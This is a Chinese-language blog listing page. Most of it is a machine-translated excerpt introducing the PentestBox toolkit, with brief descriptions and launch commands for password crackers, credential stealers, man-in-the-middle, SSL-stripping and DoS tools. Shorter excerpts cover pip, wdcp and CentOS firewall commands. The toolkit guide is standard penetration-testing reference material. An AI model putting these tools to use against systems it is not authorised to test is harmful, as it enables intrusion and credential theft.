首页
文章
分类
标签
更多
时光机
友情链接
Search
1
史上超全共享单车车锁的开锁方式(含具体方案)转
5,170 阅读
2
渗透测试工具实战技巧合集
3,483 阅读
3
URP综合教务系统通杀getshell
3,012 阅读
4
pentestbox 下安装whatweb后,报IPADDR模块没有配置的解决办法。
2,855 阅读
5
Pentest BOX安装和使用
2,297 阅读
学习资料
工具
视频
笔记
登录
Search
标签搜索
python
javascript
pentestbox
NSA
cms
linux
前端知识
jquery
安全
mysql
php
seafile
seahub
wdcp
Richar
累计撰写
130
篇文章
累计收到
4
条评论
首页
栏目
学习资料
工具
视频
笔记
页面
文章
分类
标签
时光机
友情链接
搜索到
40
篇与
Richar
的结果
2021-07-05
如何在cmd下切换python版本执行pip install
执行命令: python3 -m pip uninstall progressbar python3 -m pip install progressbar2 使用方法 python3 python3 -m pip install -r requirements.txt python3 ./DirScan.py www.****.com ./dictionary
2021年07月05日
202 阅读
2 评论
0 点赞
2021-05-24
阿里云服务器:wdcp v3版本安装 时可以正常使用,一段时间用不了的处理方法
wdcp v3版本安装 时可以正常使用,一段时间用不了的处理方法:如果 该服务器上的网站能正常打开的话,用命令 netstat -lnpt 查看8080端口 是不是在 tcp6下,如果 是的话那就是这个原因了:处理方法如下在阿里云服务器后台添加安全组规则 ,如图:wdcp 又可以通过 8080 端口打开了 ————————————————20210707新发现问题及解决方案运行netstat -lnpt 发现WDCP服务并未运行。执行service wdcp restart执行成功没有报错,但仍查询不到WDCP服务的开启。手动执行wdcp的升级命令:sh /www/wdlinux/wdcp/shell/updates.sh升级后问题依旧。进入wdcp目录下进行wdcp.sh发现报错,目录不存在,发现WDCP的软链接地址指向了一个不存在的wdcp目录版本,将目录重新指向升级后的正确wdCP目录后问题解决!#.修改 ln-snf 【新目标目录】 【软链接地址】 ln -snf bin/wdcp_v3.3.11_64 wdcp
2021年05月24日
315 阅读
0 评论
0 点赞
2020-03-24
centos 查看和关闭防火墙
查看防火墙的状态的命令为:sudo systemctl status firewalld。打开防火墙的方式有两种,一种是打开后重启会恢复回原来的状态,命令为:sudo systemctl start firewalld;另一种是打开后重启不会恢复到原来的状态,命令为:sudo systemctl enable firewalld,这种方式输入命令后要重启系统才会生效。关闭防火墙的方式也有两种,和打开相对应,命令分别为sudo systemctl stop firewalldsudo systemctl disable firewalld。
2020年03月24日
1,767 阅读
1 评论
0 点赞
2019-12-09
Pentest BOX安装和使用
0x01 Pentest BOXPentest Box:渗透测试盒子,是一款Windows平台下预配置的便携式开源渗透测试环境,而它也是著名黑客Kapustkiy常用的工具之一。这里集成的大都是Linux下的工具,Kali Linux上面的常用的很多工具这里面也都集成了。它打包了所有的安全工具,并且可以在Windows系统中原生地运行,有效地降低了对虚拟机或者双启动环境的需求。PentestBox官网:https://pentestbox.org/zh/0x02 Pentest BOX特性易于使用设计简洁性能卓越没有依赖需求方便携带Linux 工具集无驱动问题模块化更少的内存占用更少的磁盘占用内置浏览器可更新特性易于分享32位系统支持0x03 Pentest BOX安装下载地址:https://pentestbox.org/zh/#download我们可以有两种选择,一款安装了 Metasploit,另一款没有安装。在安装和使用“安装有 Metasploit 的 PentestBox” 时请关闭杀毒软件和防火墙。默认释放安装在 C:/PentestBox/。直接运行 文件 选择安装的文件位置路径,即可安装,安装其实就是文件的释放,最后整个文件夹大小为4.55GB左右。还可以直接 把PentestBox安装在移动硬盘或者 U盘中,这样就打造了移动渗透工具的平台了,在任意的windows系统上运行,这就比Kali 的Live U盘要方便许多。0x04 Pentest BOX基本文件结构PentestBox共5个文件夹,2个库文件,一个bat批处理和一个exe启动程序。bat和exe都可以启动PentestBoxbase文件夹:里面放了一些工具需要用到的环境变量文件,如:python 、jdk等bin文件夹:里面的工具基本上足够满足日常的渗透测试要求了0x05 Pentest BOX基本操作5.1 toolsmanager打开工具管理器,在这里可以 安装/升级/卸载 软件5.2 Update all installed Modules更新已经安装的工具5.3 uninstall + 软件名在toolsmanager 的软件目录里面 我们现在想卸载已经安装过的软件的话,直接键入uninstall + 软件名0x06 Pentest BOX常用工具6.1 Web漏洞扫描器Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架。C:\Users\Demon\Desktop >burpsuite Commix 有一个简单的环境,它可以被使用,从web开发人员,渗透测试人员甚至安全研究人员测试web应用程序的视图找到错误,错误或漏洞相关命令注入攻击。C:\Users\Demon\Desktop >commix dotdotpwn 这是一个非常灵活的智能fuzzer发现遍历目录等软件的漏洞HTTP / FTP / TFTP服务器,网络平台如cms,erp,博客,等等。C:\Users\Demon\Desktop >dotdotpwn fimap fimap有点python工具可以找到,准备、审计、利用甚至谷歌自动在webapps本地和远程文件包含漏洞。fimap应该像sqlmap LFI / RFI代替sql注入漏洞。这是目前正在发展但它是可用的。C:\Users\Demon\Desktop >fimap Golismero GoLismero安全性测试的是一个开源框架。这是目前针对网络安全,但它可以很容易地扩展到其他类型的扫描。C:\Users\Demon\Desktop >golismero jSQL jSQL注入是一个轻量级应用程序用于查找数据库信息从一个遥远的服务器。jSQL是免费的,开放源码和跨平台(Windows、Linux、Mac OS X、Solaris)。C:\Users\Demon\Desktop >jSQL Nikto Nikto是一个开源的web服务器(GPL)扫描仪对web服务器执行全面测试多个项目,包括超过6700个有潜在危险的文件/程序,检查超过1250台服务器的过时的版本,和版本超过270服务器上的具体问题。C:\Users\Demon\Desktop >nikto PadBuster 自动化脚本执行Padding Oracle的攻击。C:\Users\Demon\Desktop >padbuster SqlMap sqlmap是一个开源的渗透测试工具,自动检测和利用SQL注入漏洞的过程和接管的数据库服务器。它有一个强大的检测引擎,许多细分功能的最终渗透试验器和广泛的开关持续指纹数据库,从数据库获取数据,访问底层文件系统和操作系统上执行命令通过带外连接。C:\Users\Demon\Desktop >sqlmap Vega – Vega 是一个免费和开源的扫描仪和测试平台,测试web应用程序的安全。织女星可以帮助你找到并验证SQL注入、跨站脚本(XSS),不经意间透露敏感信息,和其他漏洞。它是用Java编写的,基于GUI的,运行在Linux上,OS X和窗户。C:\Users\Demon\Desktop >vega Wpscan—–WPScan是一个黑盒WordPress漏洞扫描器,可以用来扫描远程WordPress安装发现安全问题。C:\Users\Demon\Desktop >wpscan Yasuo – Yasuo是一个ruby脚本扫描脆弱的第三方web应用程序。工作时在网络安全评估(内部、外部redteam演出等),我们经常碰到脆弱的第三方web应用程序或web前端,让我们妥协远程服务器利用公开已知的漏洞。一些常见的和最喜欢的Apache Tomcat应用程序管理界面,JBoss jmx控制台C:\Users\Demon\Desktop >yasuo Zaproxy– OWASP Zed攻击代理(攻击)是一个易于使用的综合渗透测试工具在web应用程序中寻找漏洞。是设计用于与广泛的安全经验的人,因此是理想的开发和功能测试人员是渗透测试作为一个有用的补充有经验的笔测试人员工具箱。C:\Users\Demon\Desktop >zap 6.2 Web应用程序代理Burp Suite – Burp Suite是一个集成的平台进行安全性测试的web应用程序。它的各种工具无缝地协同工作,以支持整个测试过程,从最初的映射和分析应用程序的攻击表面,通过寻找和利用安全漏洞。C:\Users\Demon\Desktop >burpsuite Zaproxy- OWASP Zed攻击代理(攻击)是一个易于使用的综合渗透测试工具在web应用程序中寻找漏洞。是设计用于与广泛的安全经验的人,因此是理想的开发和功能测试人员是渗透测试作为一个有用的补充有经验的笔测试人员工具箱。C:\Users\Demon\Desktop >zap 6.3 CMS漏洞扫描器CMSmap——CMSmap python开源CMS扫描,自动检测安全漏洞的过程中最受欢迎的CMS。CMSmap的主要目的是为不同类型的cms集成常见漏洞在一个单一的工具。C:\Users\Demon\Desktop >cmsmap droopescan——基于插件的扫描仪,帮助安全研究人员识别问题Drupal。SilverStripeWordpressC:\Users\Demon\Desktop >droopescan OWASP Joomla漏洞扫描器——Joomla! 它可能是最广泛使用的CMS,由于其灵活性,用户友好性,可扩展性命名一些。因此,观察其漏洞,并添加像KB这样的漏洞到Joomla扫描器需要持续的活动。它将帮助Web开发人员和Web 大师帮助识别他们部署的Joomla可能的安全弱点! 网站。 没有Web安全扫描程序仅专用于一个CMS。C:\Users\Demon\Desktop >joomscan Wpscan———–WPScan是一个黑盒WordPress漏洞扫描器,可以用来扫描远程WordPress安装发现安全问题。C:\Users\Demon\Desktop >wpscan VbScan——VBScan perl编程语言是一个开源项目的检测链入页面CMS漏洞和分析。C:\Users\Demon\Desktop >vbscan 6.4 网络爬虫程序DirBuster——DirBuster是一个多线程java应用程序,旨在强制在Web /应用程序服务器上强制目录和文件名。作者:OWASP.org许可:Apache 2.0C:\Users\Demon\Desktop >dirbuster Burp Suite ——Burp Suite 是一个集成的平台进行安全性测试的web应用程序。它的各种工具无缝地协同工作,以支持整个测试过程,从最初的映射和分析应用程序的攻击表面,通过寻找和利用安全漏洞。作者:PortswiggerC:\Users\Demon\Desktop >burpsuite 6.5 信息收集Angry IP Scanner -Angry IP Scanner (或者只是ipscan)是一个开源和跨平台的网络扫描器设计为快速和易于使用。它扫描IP地址和端口,以及许多其他功能。人们普遍使用的网络管理员,只是好奇的世界各地的用户,包括大型和小型企业、银行和政府机构。C:\Users\Demon\Desktop >ipscan dnsrecon– DNS枚举脚本许可:GPLv2C:\Users\Demon\Desktop >dnsrecon Golismero——GoLismero安全性测试的是一个开源框架。这是目前针对网络安全,但它可以很容易地扩展到其他类型的扫描。许可:GPLv2C:\Users\Demon\Desktop >golismero Instarecon自动化的基本数字侦察。伟大的目标获得最初的足迹,发现额外的子域。InstaRecon会做的事:DNS(直接、PTR MX,NS)查找域名查询服务(域和IP)查找谷歌在搜索的子域狗屁不是Shodan查找在整个cidr反向DNS查找许可:麻省理工学院的许可C:\Users\Demon\Desktop >instarecon Nmap-Nmap(“网络映射器”)是一个免费和开源(许可证)实用程序用于网络发现和安全审计。许多系统和网络管理员也发现它有用的任务,比如网络库存,管理服务升级计划,和监控主机或服务正常运行时间。Nmap使用原始IP数据包在小说方面来确定网络上的主机可用,哪些服务(应用程序名称和版本)提供这些主机,操作系统(OS版本)他们正在运行,什么类型的数据包过滤器/防火墙正在使用,和几十个其他的特征。它旨在快速扫描大型网络,但对单一主机工作正常。Nmap运行在所有主要的电脑操作系统,和官方二进制包可供Linux,Windows,和Mac OS x除了经典Nmap命令行可执行文件,Nmap套件包括一个先进的GUI和结果查看器(Zenmap),一个灵活的数据传输,重定向,和调试工具(Ncat),比较扫描结果的一个实用程序(Ndiff)和数据包生成和响应分析工具(np)。许可:GPLv2为了使用Nmap,你需要首先安装WinPcap包捕获库,可以从Winpcap.org下载。cmd.exe C:\Users\Demon\Desktop >nmap cmd.exe C:\Users\Demon\Desktop >ncat cmd.exe C:\Users\Demon\Desktop >ndiff cmd.exe C:\Users\Demon\Desktop >nping Responder –Responder 是一个LLMNR NBT-NS和mdn投毒者,内置HTTP / SMB /该软件/ FTP / LDAP流氓身份验证服务器支持NTLMv1 / NTLMv2 / LMv2,延长安全NTLMSSP和HTTP基本身份验证。作者:SpiderLabs许可:GPLv3cmd.exe C:\Users\Demon\Desktop >responder SnmpWalk——SnmpWalk允许你检测一组变量可用于某一设备上阅读。你可以获得一个完整的列表或部分。通过分析网络设备扫描获得的结果使用SnmpWalk可以开发一个支持的mib列表,通过这种方式,获得完整的描述变量和可能的值。作者:SnmpSoft公司cmd.exe C:\Users\Demon\Desktop >snmpwalk SpiderFoot——SpiderFoot是一个开源情报自动化工具。它的目标是实现自动化的过程对给定目标收集情报,这可能是一个IP地址,域名、主机名或网络子网。SpiderFoot可以用来进攻,即作为黑盒的一部分渗透测试收集的信息目标或防守来识别你的组织是免费提供什么信息对你攻击者使用。cmd.exe C:\Users\Demon\Desktop >spiderfoot TestSSLServer——TestSSLServer是一个简单的命令行工具,联系一个SSL / TLS服务器(名称和端口给出参数),获得一些信息。作者:托马斯Pornincmd.exe C:\Users\Demon\Desktop >testsslserver SSlStrip——它将透明地劫持HTTP交通网络上,注意HTTPS连接和重定向,然后这些链接映射到类似的HTTP链接或homograph-similar HTTPS连接。它还支持模式提供一个看起来像一个锁图标标识,选择性伐木、否认和会话。许可:GPLv3cmd.exe C:\Users\Demon\Desktop >sslstrip SSLyze——SSLyze是一个Python工具,可以分析一个服务器的SSL配置连接到它。设计为快速和全面的,应该帮助组织和测试人员识别SSL服务器配置错误影响他们。许可:GPLv2cmd.exe C:\Users\Demon\Desktop >sslyze SSLScan——SSLScan测试SSL / TLS启用服务发现支持密码套件。许可:GPLv3cmd.exe C:\Users\Demon\Desktop >sslscan Sublist3r——Sublist3r是python工具,旨在列举子域的网站使用搜索引擎。它有助于渗透测试和bug猎人收集和收集他们的目标域的子域。Sublist3r目前支持以下搜索引擎:谷歌,雅虎,必应,百度,问。更多的搜索引擎可能被添加在未来。使用Netcraft和DNSdumpster Sublist3r也收集子域。许可:GPLv2cmd.exe C:\Users\Demon\Desktop >sublist3r SubbruteSubBrute是一个社区驱动的项目的目标创造最快的和最精确的子域名枚举的工具。背后的一些魔法SubBrute是它使用解析器作为一种开放代理绕过DNS病原。这个设计还提供了一层匿名,SubBrute不直接发送交通目标的名字服务器。许可:GPLv3cmd.exe C:\Users\Demon\Desktop >subbrute Tekdefense-Automater-自动化是一个URL /域名,IP地址和Md5 hash OSINT工具旨在使分析过程更容易入侵分析师。给定一个目标(URL、IP或散列)或一个文件全自动化目标将返回相关的结果来源如下:IPvoid.com,Robtex.com,Fortiguard.com,unshorten。我,Urlvoid.com,Labs.alienvault.com,ThreatExpert VxVault,VirusTotal。作者:TekDefense.comcmd.exe C:\Users\Demon\Desktop >automater UrlCrazy——生成和测试域输入错误和变化检测和执行错误蹲,URL劫持,钓鱼,和企业间谍活动。许可:非商业性cmd.exe C:\Users\Demon\Desktop >urlcrazy The Harvester ——The Harvester 电子邮件帐户,子域名名称、虚拟主机、开放端口/横幅,和员工的名字从不同的公共资源(搜索引擎,pgp关键服务器)。许可:GPLv2cmd.exe C:\Users\Demon\Desktop >theharvester Wireshark——Wireshark是世界上最重要的网络协议分析仪。它让你看到发生了什么在您的网络在微观水平。这是事实上的标准(通常法理)在许多行业和教育机构。Wireshark发展繁荣的贡献全球网络专家。许可:GPLv2cmd.exe C:\Users\Demon\Desktop >wireshark 6.6 开发工具Beef Project——beef是浏览器开发框架。这是一个渗透测试工具,它关注的是web浏览器。作者:Wade Alcorn许可:GPLv2cmd.exe C:\Users\Demon\Desktop >beefproject CrackMapExec-其中的瑞士军刀Windows /活动目录环境。多亏了托马斯。编译的版本。作者:byt3bl33d3rcmd.exe C:\Users\Demon\Desktop >crackmapexec Metasploit Framework——世界上最好用渗透测试框架。作者:Rapid7许可:BSD 3条款许可协议请注意PentestBox的有两个版本,一个与Metasploit Metasploit和另一个。如果没有完成下载Metasploit变体在这里。cmd.exe C:\Users\Demon\Desktop cmd.exe C:\Users\Demon\Desktop >msfvenom cmd.exe C:\Users\Demon\Desktop >msfelfscan cmd.exe C:\Users\Demon\Desktop >msfbinscan cmd.exe C:\Users\Demon\Desktop >msfpescan cmd.exe C:\Users\Demon\Desktop >msfd cmd.exe C:\Users\Demon\Desktop >msfmachscan SqlMap——sqlmap是一个开源的渗透测试工具,自动检测和利用SQL注入漏洞的过程和接管的数据库服务器。它有一个强大的检测引擎,许多细分功能的最终渗透试验器和广泛的开关持续指纹数据库,从数据库获取数据,访问底层文件系统和操作系统上执行命令通过带外连接。作者:Miroslav Stampar Bernardo Damele Assumpcao吉马良斯许可:GPLv2cmd.exe C:\Users\Demon\Desktop 6.7 密码破解Burp Suite——Burp Suite是一个集成的平台进行安全性测试的web应用程序。它的各种工具无缝地协同工作,以支持整个测试过程,从最初的映射和分析应用程序的攻击表面,通过寻找和利用安全漏洞。cmd.exe C:\Users\Demon\Desktop >burpsuite Findmyhash——findmyhash。py尝试不同类型的裂缝散列使用免费的在线服务。作者:JulGor许可:GPLv3cmd.exe C:\Users\Demon\Desktop >findmyhash HashIdentifier——软件来识别不同类型的散列加密数据,尤其是密码使用。作者:Zion3R许可:GPLv3cmd.exe C:\Users\Demon\Desktop >hashidentifier Hashcat——Hashcat是世界上最快的CPU-based密码恢复工具。许可证cmd.exe C:\Users\Demon\Desktop >hashcat-cli32 cmd.exe C:\Users\Demon\Desktop >hashcat-cli64 cmd.exe C:\Users\Demon\Desktop >hashcat-cliXOP LaZagne——LaZagne项目是一个开放源码应用程序用于检索大量的密码存储在本地计算机。每个软件存储密码使用不同的技术(明文、api、自定义算法、数据库等)。这个工具已经开发为目的的找到这些密码为最常用的软件。这时,它支持22个项目在使用微软的Windows操作系统和12在Linux /类unix操作系统。作者:AlessandroZ许可:GPLv3cmd.exe C:\Users\Demon\Desktop >lazagne John the Ripper——John the Ripper是一个快速密码饼干,目前对于许多风格的Unix,窗户,DOS,BeOS和OpenVMS。它的主要目的是检测弱Unix密码。除了在各种Unix系统上最常见的几种crypt(3)密码哈希类型,支持开箱即用的是Windows LM hash,以及社区增强版本中的大量其他哈希和密码。cmd.exe C:\Users\Demon\Desktop >johntheripper Patator——Patator是出于对使用Hydra,Medusa,Ncrack,Metasploit模块和Nmap NSE脚本的密码猜测攻击的挫折。 我选择了不同的方法,以便不创建另一个暴力的工具,并避免重复相同的缺点。 Patator是一个用Python编写的多线程工具,力求比其他前辈更可靠和更灵活。作者:Sebastien MACKE许可:GPLv2cmd.exe C:\Users\Demon\Desktop >patator RainbowCrack——RainbowCrack是Philippe Oechslin更快的时间存储器权衡技术的一般建议实现。 它裂纹散列与彩虹表.RainbowCrack使用时间内存权衡算法来破解哈希。 它不同于强力哈希饼干。强力哈希饼干生成所有可能的明文,并在飞行中计算相应的哈希,然后将哈希与要破解的哈希进行比较。 一旦找到匹配,找到明文。 如果所有可能的明文都被测试并且没有找到匹配,则找不到明文。 利用这种类型的散列破解,丢弃所有中间计算结果。作者:RainbowCrack项目cmd.exe C:\Users\Demon\Desktop >rcrack cmd.exe C:\Users\Demon\Desktop >rt2rtc cmd.exe C:\Users\Demon\Desktop >rtgen cmd.exe C:\Users\Demon\Desktop >rtsort cmd.exe C:\Users\Demon\Desktop >rcrack_cl cmd.exe C:\Users\Demon\Desktop >rcrack_cl_gui cmd.exe C:\Users\Demon\Desktop >rcrack_cuda cmd.exe C:\Users\Demon\Desktop >rcrack_cuda_gui THC Hydra– Hydra是一个并行登录饼干支持众多的协议攻击。非常快和灵活,很容易添加新的模块。这个工具可以让研究人员和安全顾问展示将是多么容易获得未授权访问远程系统。请注意,PentestBox包含编译的版本THC-Hydra来自在这里.许可:GPLv3cmd.exe C:\Users\Demon\Desktop >hydra cmd.exe C:\Users\Demon\Desktop >pw-inspector Zaproxy– OWASP Zed攻击代理(攻击)是一个易于使用的综合渗透测试工具在web应用程序中寻找漏洞。是设计用于与广泛的安全经验的人,因此是理想的开发和功能测试人员是渗透测试作为一个有用的补充有经验的笔测试人员工具箱。作者:Simon Bennettscmd.exe C:\Users\Demon\Desktop >zap 6.8 安卓系统安全AndroBugs Framework -—AndroBugs Android脆弱性分析框架是一个系统,有助于开发人员或黑客在Android应用程序找到潜在的安全漏洞。没有灿烂的GUI界面,但最有效的(平均每扫描不到2分钟)和更准确。作者:AndroBugs作者:GPLv3cmd.exe C:\Users\Demon\Desktop >androbugs Androguard逆向工程,恶意软件和goodware Android应用程序的分析……和更多(忍者!)作者: Anthony Desnos许可:Apache版本2.0cmd.exe C:\Users\Demon\Desktop >androapkinfo cmd.exe C:\Users\Demon\Desktop >androarsc cmd.exe C:\Users\Demon\Desktop >androauto cmd.exe C:\Users\Demon\Desktop >androaxml cmd.exe C:\Users\Demon\Desktop >androcsign cmd.exe C:\Users\Demon\Desktop >androdd cmd.exe C:\Users\Demon\Desktop >androdiff cmd.exe C:\Users\Demon\Desktop >androdis cmd.exe C:\Users\Demon\Desktop >androgui Androwarn——Androwarn是一个工具,它的主要目的是对潜在的恶意行为检测和警告用户开发的Android应用程序。作者: Thomas D许可:GPLv3cmd.exe C:\Users\Demon\Desktop >androwarn ApkTool逆向工程第三方的工具,关闭,二进制Android应用程序。它可以解码资源接近原始形式和重建后做一些修改,这使得有可能逐步调试smali代码。还使用一个应用程序就会变得容易些,因为项目的文件结构和自动化等重复性的任务构建apk,等等。作者:Connor Tumbleson, Ryszard Wiśniewski许可:Apache版本cmd.exe C:\Users\Demon\Desktop >apktool ByteCode Viewer ——反向工程第三方,封闭,二进制Android应用程序的工具。 它可以将资源解码为几乎原始的形式,并在做出一些修改后重建它们; 它使得可以一步一步地调试smali代码。 此外,它使一个应用程序的工作更容易,因为像项目一样的文件结构和自动化一些重复的任务,如构建apk等。作者:konloch许可:GPLv3cmd.exe C:\Users\Demon\Desktop >bytecodeviewer dex2jar——转换。dex文件。类文件(压缩jar)作者:鲍勃·潘许可:Apache版本cmd.exe C:\Users\Demon\Desktop >d2j-dex2jar cmd.exe C:\Users\Demon\Desktop >d2j-dex2smali cmd.exe C:\Users\Demon\Desktop >d2j-jar2dex cmd.exe C:\Users\Demon\Desktop >d2j-decrypt-string Jadx——敏捷的Java编译器作者:skylot许可:Apachecmd.exe C:\Users\Demon\Desktop >jadx cmd.exe C:\Users\Demon\Desktop >jadx-gui JD-GUI——JD-GUI是一个独立的图形工具显示的Java源代码”。阶级”文件。你可以浏览重建源代码JD-GUI即时访问方法和字段。许可:免费非商业用途cmd.exe C:\Users\Demon\Desktop >jd-gui Pidcat——彩色logcat脚本,只显示了一个特定的应用程序包的日志条目。作者 Jake Whartoncmd.exe C:\Users\Demon\Desktop >pidcat 6.9 逆向工程ApkTool—-逆向工程第三方的工具,关闭,二进制Android应用程序。它可以解码资源接近原始形式和重建后做一些修改,这使得有可能逐步调试smali代码。还使用一个应用程序就会变得容易些,因为项目的文件结构和自动化等重复性的任务构建apk,等等。作者:Connor Tumbleson, Ryszard Wiśniewski许可:Apache版本cmd.exe C:\Users\Demon\Desktop >apktool dex2jar——转换。dex文件。类文件(压缩jar)作者:Bob Pan许可:Apache版本cmd.exe C:\Users\Demon\Desktop >d2j-dex2jar cmd.exe C:\Users\Demon\Desktop >d2j-dex2smali cmd.exe C:\Users\Demon\Desktop >d2j-jar2dex cmd.exe C:\Users\Demon\Desktop >d2j-decrypt-string Jad —— Jad provides提供了一个命令行用户界面从类文件中提取源代码。作者: Pavel Kouznetsovcmd.exe C:\Users\Demon\Desktop >jad JD-GUI——JD-GUI是一个独立的图形工具显示的Java源代码”。阶级”文件。你可以浏览重建源代码JD-GUI即时访问方法和字段。许可:免费非商业用途cmd.exe C:\Users\Demon\Desktop >jd-gui JavaSnoop——JavaSnoop是安全工具,它允许一个方面安全测试人员轻松地测试Java应用程序的安全。作者:www.aspectsecurity.com许可:GPLv3cmd.exe C:\Users\Demon\Desktop OllyDbg——OllyDbg 32位汇编级别分析调试器为Microsoft®Windows®作者:Oleh pokalchuk Yuschukcmd.exe C:\Users\Demon\Desktop >ollydbg Radare2——r2是从头开始的重写,以提供一组库和工具来处理二进制文件.Radare项目作为取证工具启动,脚本命令行十六进制编辑器能够打开磁盘文件,但后来支持分析二进制文件, 反汇编代码,调试程序,附加到远程gdb服务器。cmd.exe C:\Users\Demon\Desktop >radare2 打开网络服务器,请遵循下面。cmd.exe C:\Users\Demon\Desktop >radare2directory C:\PentestBox\bin\ReverseEngineering\radare2 $radare2.exe - c = H rax2.exe Smali/Baksmali -=smali / baksmali是dalvik使用的dex格式的汇编/反汇编器,Android的Java VM实现。 语法是松散地基于Jasmin的/ dedexer的语法,并支持dex格式的完整功能(注释,调试信息,行信息等)。您可以通过键入smali和baksmali访问smali和baksmali许可:BSDcmd.exe C:\Users\Demon\Desktop >smali cmd.exe C:\Users\Demon\Desktop >baksmali 6.10 压力测试THC-SSL-DOS——THC-SSL-DOS工具是一个概念证明披露可疑SSL的安全工具。这工作好如果服务器支持SSL重新谈判。它仍然工作如果不支持SSL重新谈判,但之前需要一些修改和更多的机器人可以看到产生影响。许可:GPLv2cmd.exe C:\Users\Demon\Desktop 6.11 嗅探Burp Suite ——Burp Suite 是一个集成的平台进行安全性测试的web应用程序。它的各种工具无缝地协同工作,以支持整个测试过程,从最初的映射和分析应用程序的攻击表面,通过寻找和利用安全漏洞。cmd.exe C:\Users\Demon\Desktop >burpsuite DNSChef——DNSChef是一个高度可配置DNS代理渗透测试人员和恶意软件分析师。DNS代理(又名“假DNS”)是一个工具用于应用程序的网络流量分析等用途。例如,可以使用DNS代理伪造请求“badguy.com”指向一个本地机器终止或拦截,而不是一个真正的主机在互联网上的某个地方。作者:thesprawl许可:GPLv3cmd.exe C:\Users\Demon\Desktop >dnschef Ettercap——Ettercap是一套综合的中间人攻击。它嗅探的实时连接,动态内容过滤和其他许多有趣的把戏。它支持主动和被动解剖的许多协议和包括许多功能网络和主机的分析。许可:GPLv2cmd.exe C:\Users\Demon\Desktop >ettercap ngrep——ngrep pcap-aware工具将允许您指定扩展正则表达式匹配的数据包有效载荷数据。cmd.exe C:\Users\Demon\Desktop >ngrep Network Miner ——NetworkMiner可以用作被动网络嗅探器/数据包捕获工具,以便检测操作系统,会话,主机名,开放端口等,而不在网络上引入任何流量。 NetworkMiner还可以解析PCAP文件进行离线分析,并从PCAP文件重新生成/重新组合传输的文件和证书。作者:NETRESECcmd.exe C:\Users\Demon\Desktop >networkminer Responder— Responder 是LLMNR,NBT-NS和MDNS中毒程序,内置支持NTLMv1 / NTLMv2 / LMv2,扩展安全性NTLMSSP和基本HTTP身份验证的HTTP / SMB / MSSQL / FTP / LDAP流氓认证服务器。许可:GPLv3cmd.exe C:\Users\Demon\Desktop >responder SSlStrip——它将透明地劫持网络上的HTTP流量,监视HTTPS链接和重定向,然后将这些链接映射到类似于HTTP的链接或同源图类似的HTTPS链接。 它还支持提供图标的模式,看起来像一个锁图标,选择性日志记录和会话拒绝。许可:GPLv3cmd.exe C:\Users\Demon\Desktop >sslstrip WinDump——WinDump tcpdump的Windows版本,UNIX命令行网络分析仪。WinDump完全兼容tcpdump和可以用来观察,诊断并保存到磁盘网络流量根据各种复杂的规则。许可:BSDcmd.exe C:\Users\Demon\Desktop >windump Wireshark——Wireshark – Wireshark是世界上最重要的网络协议分析器。 它可以让你看到你的网络在微观层面上发生了什么。 它是许多行业和教育机构的事实上(并通常是法律上的)标准。 Wireshark的发展蓬勃发展得益于全球网络专家的贡献。cmd.exe C:\Users\Demon\Desktop >wireshark Zaproxy– OWASP Zed攻击代理(攻击)是一个易于使用的综合渗透测试工具在web应用程序中寻找漏洞。是设计用于与广泛的安全经验的人,因此是理想的开发和功能测试人员是渗透测试作为一个有用的补充有经验的笔测试人员工具箱。cmd.exe C:\Users\Demon\Desktop >zap 6.12 取证工具Bulk Extractor——bulk_extractor是一种计算机取证工具,用于扫描磁盘映像,文件或文件目录,并提取有用信息而无需解析文件系统或文件系统结构。 可以使用自动化工具轻松检查,解析或处理结果。 bulk_extractor还创建了它找到的特征的直方图,因为更常见的特征往往更重要。 该程序可用于执法,国防,情报和网络调查应用程序。作者:Simson l·加芬克尔许可:GPLv2cmd.exe C:\Users\Demon\Desktop >bulkextractor CapTipper——CapTipper是一个python工具,用于分析,探索和恢复HTTP恶意流量。 CapTipper设置了一个Web服务器,该服务器与PCAP文件中的服务器完全一样,并且包含内部工具,以及一个强大的交互式控制台,用于分析和检查发现的主机,对象和对话。cmd.exe C:\Users\Demon\Desktop >captipper DumpZilla——Dumpzilla应用程序是在Python 3.x中开发的,目的是提取Firefox,Iceweasel和Seamonkey浏览器的所有取证有趣的信息进行分析。 由于其Python 3.x开发,可能无法在旧的Python版本正常工作,主要是与某些字符。 在Unix和Windows 32/64位系统下工作。 在命令行界面中工作,所以信息转储可以通过管道重定向工具,如grep,awk,cut,sed …许可:GPLv3cmd.exe C:\Users\Demon\Desktop >dumpzilla Loki ——扫描仪的简单指标妥协。检测是基于四个检测方法:国际奥委会文件名称:正则表达式匹配完整的文件路径和名称雅苒规则检查:雅苒签名匹配文件内存和处理数据哈希校验:比较已知的恶意散列(MD5、SHA1,SHA256)和扫描文件cmd.exe C:\Users\Demon\Desktop >loki Make PDF Tools——make-pdf-javascript。py允许与嵌入JavaScript创建一个简单的PDF文档打开时将执行的PDF文档。它本质上是mPDF胶水代码。py模块包含一个类方法来创建标题,间接对象,stream objects,stream objects和XREFs。作者:/迪迪埃·史蒂文斯cmd.exe C:\Users\Demon\Desktop >make-pdf-embedded cmd.exe C:\Users\Demon\Desktop >make-pdf-javascript Origami–Origami是一个用于操作PDF文档的Ruby框架。 它具有PDF兼容的解析器,并允许分析,修改或创建恶意的PDF文件。 虽然它可能用于多种用途,但折纸主要用作安全工具。 因此,它不专注于文档的图形内容,并且不包括PDF渲染器。许可:GPLcmd.exe C:\Users\Demon\Desktop >pdfsh pedump-一个纯ruby实现win32 PE二进制文件转储。作者:zed_0xff许可:麻省理工学院cmd.exe C:\Users\Demon\Desktop >pedump PDF Parser——这个工具将解析一个PDF文档识别分析文件中使用的基本要素。它不会呈现一个PDF文档。作者:迪迪埃·史蒂文斯cmd.exe C:\Users\Demon\Desktop >pdf-parser pdfid——这个工具不是一个PDF解析器,但它将扫描一个文件寻找某些PDF关键词,允许您识别PDF文档包含JavaScript或执行一个动作(例如)当打开。PDFiD还将处理名称混淆。作者:迪迪埃·史蒂文斯cmd.exe C:\Users\Demon\Desktop >pdfid PeePDF——peepdf是一个Python工具探索PDF文件为了找出如果文件可以是有害的。这个工具的目的是提供所有必需的组件安全研究员可以在不使用PDF分析需要3或4工具的所有任务。与peepdf可以看到所有可疑的元素,在文档中显示的对象支持最常用的过滤器和编码,可以解析一个文件的不同版本,对象流和加密的文件。许可:GPLv3cmd.exe C:\Users\Demon\Desktop >peepdf rekall 